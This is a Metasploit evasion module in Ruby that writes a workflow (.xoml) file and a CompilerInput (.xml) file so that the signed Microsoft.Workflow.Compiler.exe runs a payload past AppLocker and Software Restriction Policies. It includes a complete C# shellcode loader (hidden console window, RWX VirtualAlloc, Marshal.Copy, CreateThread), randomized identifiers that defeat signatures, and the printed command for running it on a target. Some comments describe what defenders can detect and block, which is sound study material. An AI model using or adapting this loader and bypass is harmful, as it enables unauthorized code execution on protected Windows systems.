##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Evasion module that wraps the selected payload in a C# workflow (.xoml) file
# plus a Microsoft.Workflow.Compiler CompilerInput (.xml) that references it.
# The module itself only writes those two files and prints the command line
# the operator has to run on the target; nothing is executed from here.
#
# Defender's view of what the generated artifacts look like:
#   * a Microsoft.Workflow.Compiler.exe invocation with an operator-supplied
#     .xml/.xoml pair (the living-off-the-land part; AppLocker/WDAC deny rules
#     for that binary close the vector, see the SpecterOps reference below);
#   * inside the compiled workflow, a VirtualAlloc with 0x1000 (MEM_COMMIT) and
#     protection 0x40 (PAGE_EXECUTE_READWRITE), a Marshal.Copy of the decoded
#     payload into it, and a CreateThread on that address — the classic
#     in-process loader sequence that memory-scanning and ETW/EDR rules key on;
#   * generateInMemory is true in the CompilerInput, so no assembly is written
#     to disk by the compiler.
class MetasploitModule < Msf::Evasion
  # Module metadata plus the two filename options. The inherited FILENAME
  # option is deregistered because this module produces two files, not one.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Applocker Evasion - Microsoft Workflow Compiler',
      'Description' => %(
        This module will assist you in evading Microsoft
        Windows Applocker and Software Restriction Policies.
        This technique utilises the Microsoft signed binaries
        Microsoft.Workflow.Compiler.exe to execute user supplied code.
      ),
      'Author' =>
        [
          'Nick Tyrer <@NickTyrer>', # module development
          'Matt Graeber' # workflow_compiler bypass research
        ],
      'License' => 'MSF_LICENSE',
      'Platform' => 'win',
      'Arch' => [ARCH_X86, ARCH_X64],
      'Targets' => [['Microsoft Windows', {}]],
      'References' => [['URL', 'https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb']])
    )

    register_options(
      [
        OptString.new('XOML_FILE', [true, 'Filename for the .xoml file (default: workflow.xoml)', 'workflow.xoml']),
        OptString.new('XML_FILE', [true, 'Filename for the .xml file (default: workflow.xml)', 'workflow.xml'])
      ]
    )

    # Two output files are written by create_files, so the single FILENAME
    # option of the parent class does not apply.
    deregister_options('FILENAME')
  end

  # Returns the encoded payload as a base64 String. workflow_xoml embeds it as
  # a C# string literal that the generated loader decodes at runtime.
  def build_payload
    Rex::Text.encode_base64(payload.encoded)
  end

  # Returns eight random alphabetic characters; used as a C# identifier so the
  # generated source carries no fixed class/method/field names.
  def obfu
    Rex::Text.rand_text_alpha 8
  end

  # Builds the .xoml workflow document: a SequentialWorkflowActivity whose
  # x:Code block holds the C# loader. Every identifier in that loader is
  # randomized per call (see the index map below), so the only stable strings
  # left are the XAML namespaces and the P/Invoke declarations — which is
  # exactly what a content signature would have to match on.
  #
  # Returns: the complete .xoml document as a String.
  #
  # NOTE(review): the thirteen obfu calls are independent, so two of them can
  # return the same name; the generated C# would then fail to compile. Not
  # likely at eight alphabetic characters, but not guarded against either.
  def workflow_xoml
    esc = build_payload
    mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]
    # Index map for mod[]:
    #   0  x:Class name of the workflow activity
    #   1  C# class name (must match 0 only by convention, not required here)
    #   2  static loader method called from the constructor
    #   3  console window handle (hidden via ShowWindow with mod[4] == 0)
    #   4  const int 0 passed to ShowWindow
    #   5  base64 payload string, 6 decoded bytes, 7 alias of 6
    #   8  VirtualAlloc result (the executable buffer)
    #   9  protection constant 0x40, 12 allocation type 0x1000
    #   10 zero IntPtr reused for CreateThread's attribute/parameter/id args
    #   11 WaitForSingleObject timeout 0xFFFFFFFF (wait forever)
    <<~HEREDOC
      <SequentialWorkflowActivity x:Class="#{mod[0]}" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
      <x:Code><![CDATA[
      public class #{mod[1]} : SequentialWorkflowActivity
      {
      public #{mod[1]}()
      {
      #{mod[2]}();
      }
      public static void #{mod[2]}()
      {
      IntPtr #{mod[3]};
      #{mod[3]} = GetConsoleWindow();
      ShowWindow(#{mod[3]}, #{mod[4]});
      string #{mod[5]} = "#{esc}";
      byte[] #{mod[6]} = Convert.FromBase64String(#{mod[5]});
      byte[] #{mod[7]} = #{mod[6]};
      IntPtr #{mod[8]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[7]}.Length, #{mod[12]}, #{mod[9]});
      System.Runtime.InteropServices.Marshal.Copy(#{mod[7]}, 0, #{mod[8]}, #{mod[7]}.Length);
      IntPtr #{mod[10]} = IntPtr.Zero;
      WaitForSingleObject(CreateThread(#{mod[10]}, UIntPtr.Zero, #{mod[8]}, #{mod[10]}, 0, ref #{mod[10]}), #{mod[11]});
      }
      private static Int32 #{mod[12]}=0x1000;
      private static IntPtr #{mod[9]}=(IntPtr)0x40;
      private static UInt32 #{mod[11]} = 0xFFFFFFFF;
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr #{mod[10]});
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
      [System.Runtime.InteropServices.DllImport("user32.dll")]
      static extern bool ShowWindow(IntPtr #{mod[3]}, int nCmdShow);
      [System.Runtime.InteropServices.DllImport("Kernel32")]
      private static extern IntPtr GetConsoleWindow();
      const int #{mod[4]} = 0;
      }
      ]]></x:Code>
      </SequentialWorkflowActivity>
    HEREDOC
  end

  # Builds the CompilerInput document consumed by Microsoft.Workflow.Compiler.
  # The <files> entry names the .xoml file by the XOML_FILE datastore value
  # (a bare filename, so the .xoml must sit in the compiler's working directory
  # on the target); languageToUse is CSharp and generateInMemory is true, so the
  # compiled assembly never touches disk.
  #
  # Returns: the complete .xml document as a String.
  #
  # NOTE(review): create_files may append ".xoml" to the option value before
  # this runs; whether the name emitted here then carries that suffix depends
  # on datastore[] returning the same String object that create_files mutates
  # with `<<` — confirm, otherwise the XML would point at a file that was
  # written under a different name.
  def workflow_xml
    <<~HEREDOC
      <?xml version="1.0" encoding="utf-8"?>
      <CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
      <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
      <d2p1:string>#{datastore['XOML_FILE']}</d2p1:string>
      </files>
      <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
      <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
      <compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
      <coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
      <embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
      <evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
      <generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
      <generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
      <includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
      <linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
      <mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
      <outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
      <tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
      <treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
      <warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>
      <win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
      <d2p1:checkTypes>false</d2p1:checkTypes>
      <d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
      <d2p1:compilerOptions i:nil="true" />
      <d2p1:generateCCU>false</d2p1:generateCCU>
      <d2p1:languageToUse>CSharp</d2p1:languageToUse>
      <d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
      <d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
      <d2p1:mtInfo i:nil="true" />
      <d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
      </parameters>
      </CompilerInput>
    HEREDOC
  end

  # Combined getter/setter for the output filename: with no argument (or an
  # empty one) returns @fname, otherwise stores `name` in @fname and returns it.
  # NOTE(review): presumably this overrides the Msf::Evasion hook that
  # file_create consults for the target path, which is how create_files can
  # write two differently named files — confirm against the parent class.
  def file_format_filename(name = '')
    name.empty? ? @fname : @fname = name
  end

  # Writes the .xoml and .xml files. Each name falls back to the option default
  # when empty and gets its extension appended if missing (case-insensitive
  # check). The documents are rendered before either file is written.
  #
  # NOTE(review): `<<` appends in place, so when the ternary yields the
  # datastore's own String object the option value is mutated too; that
  # in turn decides whether workflow_xml and instructions see the suffixed
  # name or the original one.
  def create_files
    f1 = datastore['XOML_FILE'].empty? ? 'workflow.xoml' : datastore['XOML_FILE']
    f1 << '.xoml' unless f1.downcase.end_with?('.xoml')
    f2 = datastore['XML_FILE'].empty? ? 'workflow.xml' : datastore['XML_FILE']
    f2 << '.xml' unless f2.downcase.end_with?('.xml')
    xoml_file = workflow_xoml
    xml_file = workflow_xml
    file_format_filename(f1)
    file_create(xoml_file)
    file_format_filename(f2)
    file_create(xml_file)
  end

  # Prints the operator instructions: which two files to copy and the
  # Microsoft.Workflow.Compiler.exe command line, choosing the Framework or
  # Framework64 directory from the payload's first architecture (x86 vs. x64).
  # The trailing random three-letter argument fills the compiler's second
  # positional parameter (its output/results path, per the referenced write-up).
  #
  # NOTE(review): the filenames printed here come from the datastore, while
  # create_files may have written them with an added extension — see the
  # mutation note on create_files for why these may or may not agree.
  def instructions
    print_status "Copy #{datastore['XOML_FILE']} and #{datastore['XML_FILE']} to the target"
    if payload.arch.first == ARCH_X86
      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\Microsoft.Workflow.Compiler.exe #{datastore['XML_FILE']} #{Rex::Text.rand_text_alpha 3}"
    else
      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\Microsoft.Workflow.Compiler.exe #{datastore['XML_FILE']} #{Rex::Text.rand_text_alpha 3}"
    end
  end

  # Module entry point: write the two files, then print how to use them.
  def run
    create_files
    instructions
  end
end